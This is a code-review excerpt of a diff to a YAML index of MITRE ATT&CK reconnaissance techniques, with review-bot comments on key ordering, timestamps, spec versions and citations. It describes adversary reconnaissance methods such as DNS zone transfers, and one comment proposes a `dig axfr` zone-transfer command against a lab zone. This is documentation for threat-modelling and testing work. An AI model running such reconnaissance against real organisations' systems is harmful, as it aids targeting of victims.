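Review bot: the visible part of this hunk deletes `modified`, `name`, `description`, `kill_chain_phases`, `x_mitre_detection`, `x_mitre_version: '1.1'`, `x_mitre_data_sources` and `x_mitre_is_subtechnique` from the Gather Victim Host Information entry and adds back only `url`, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0`. If those keys were re-emitted above the start of this excerpt this is just a key reorder, but please confirm the regenerated entry still carries at least `name`, `description` and `x_mitre_version`; an index entry with `atomic_tests: []` and no technique name is silently useless to anything that renders the index. The same reorder moves the ThreatConnect `url` from before `description` to after it; pinning a canonical key order in the generator would keep future upstream syncs down to content changes only.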
@@ -54777,7 +55454,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
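Review bot: the `modified` timestamp for Digital Certificates moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-04-15T03:48:37.628Z`, and the same regression repeats for most unchanged techniques in this patch. Taken together with the `spec_version: '2.1'` removals, this looks like a change of upstream source bundle rather than a content revert; if that is the case, the commit message should say so explicitly, because any consumer using `modified` to detect upstream changes will read this as a rollback.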
@@ -54793,8 +55470,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
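Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are dropped from Digital Certificates with no replacement, while entries that upstream touched more recently in this same patch (DNS, Search Victim-Owned Websites, Search Engines) keep an `x_mitre_attack_spec_version: 3.2.0`. After this change the field is present on some entries and absent on others; anything that parses the index should treat a missing `x_mitre_attack_spec_version` as unknown/legacy rather than failing, and that should be stated wherever the index format is documented.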
@@ -54816,7 +55491,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54832,8 +55507,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -54861,7 +55534,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54877,33 +55550,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
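Review bot: the new AXFR paragraph cites `Trails-DNS`, `DNS-CISA` and `Alexa-dns`, which are only defined in the following hunk, so these two hunks must land together or the citations dangle. The edit from "DNS, MX, TXT, and SPF records" to "DNS MX, TXT, and SPF records" is a genuine correction (MX, TXT and SPF are DNS record types, not siblings of DNS) and justifies the `x_mitre_version` bump from '1.1' to '1.2'. The rest of the hunk (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique`, `x_mitre_platforms`) is a pure key reorder with unchanged values. Since the entry still ends in `atomic_tests: []`, a zone-transfer attempt against a lab zone (`dig axfr <zone> @<ns>`) would be an obvious first atomic for this sub-technique.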
@@ -54917,18 +55590,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
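Review bot: the `DNS-CISA` reference dates the alert to "2016, September 29" but its URL path reads `alerts/2015/04/13`; one of the two is wrong and should be checked against the CISA page before merge. Smaller points in the same hunk: the `Alexa-dns` description has no author, unlike every other reference here, and the Sean Metcalf citation changes `twitter.com/.../photo/1` to `x.com/...` without the `/photo/1` suffix, so verify that the image the citation relies on still resolves. The `Trails-DNS` entry correctly uses a web.archive.org snapshot, which is the pattern to follow for the other blog links in this patch.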
@@ -54949,7 +55633,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54965,39 +55649,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
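Review bot: the T1594 description changes from a `|-` literal block scalar to a double-quoted flow scalar with embedded `\n\n`, and the new text ends with a trailing space before the closing quote (`Register Robots TXT 2015) "`). The content is equivalent, but the quoted form is much harder to review and will re-wrap differently on every regeneration; configure the dumper to keep block style for multi-line strings and strip trailing whitespace, so that this diff would show only the added sitemap.xml/robots.txt paragraph.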
@@ -55005,13 +55687,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
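Review bot: `type`, `id`, `created`, `created_by_ref` and `external_references` removed at the top of the T1594 object in the previous hunk are re-added here at the bottom, unchanged apart from the two new references, `revoked: false`, and the `url`/`external_id` swap inside the `mitre-attack` entry. The new `Perez Sitemap XML 2023` and `Register Robots TXT 2015` source names match the `(Citation: ...)` keys used in the updated description, so citation resolution stays intact, and the `x_mitre_version` bump to '1.1' is consistent with a description change. The reorder itself is noise; a fixed key order in the generator would have made this hunk three added lines.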
@@ -55036,7 +55746,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -55052,8 +55762,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -55075,7 +55783,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -55091,8 +55799,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -55118,7 +55824,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -55136,13 +55842,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55198,7 +55902,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
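Review bot: the ACSC `url` is swapped for a 2021-07-08 web.archive.org snapshot, but the description keeps "Retrieved October 19, 2020", whereas the OPM Leak change later in this patch updates the retrieval date together with the archived URL. Either convention works, but it should be one convention across the file. The `TrendMictro Phishing` source_name on the context line is a pre-existing typo; leave it, since `(Citation: ...)` references match on the exact string.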
@@ -55249,7 +55953,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -55270,7 +55973,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55286,8 +55989,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -55309,7 +56010,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55325,8 +56026,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -55348,7 +56047,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55364,12 +56063,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55409,8 +56106,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
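Review bot: this is the right shape for a dead-link fix, the retrieval date moves to "September 16, 2024" alongside the archive snapshot URL for the OPM Leak reference; please apply the same treatment to the ACSC Email Spoofing change earlier in this patch so the two are consistent. The snapshot is dated 2023-06-02, so if the live opm.gov page has since moved rather than disappeared, the archived copy may not reflect the current incident list.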
@@ -55455,11 +56152,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55499,9 +56195,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
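Review bot: Vulnerability Scanning gets `modified` advanced to 2024-10-15 and `x_mitre_attack_spec_version` bumped from 3.1.0 to 3.2.0, but no content change is visible in this hunk. If the upstream change was only the spec-version bump, `x_mitre_version` should be unchanged; if the description or references did change, that part of the object should appear in this diff. Worth confirming before merge rather than trusting the timestamp.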
@@ -55563,7 +56258,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -55589,7 +56283,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55610,8 +56304,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -55676,7 +56368,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -55724,7 +56415,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -55746,7 +56436,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55762,34 +56452,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
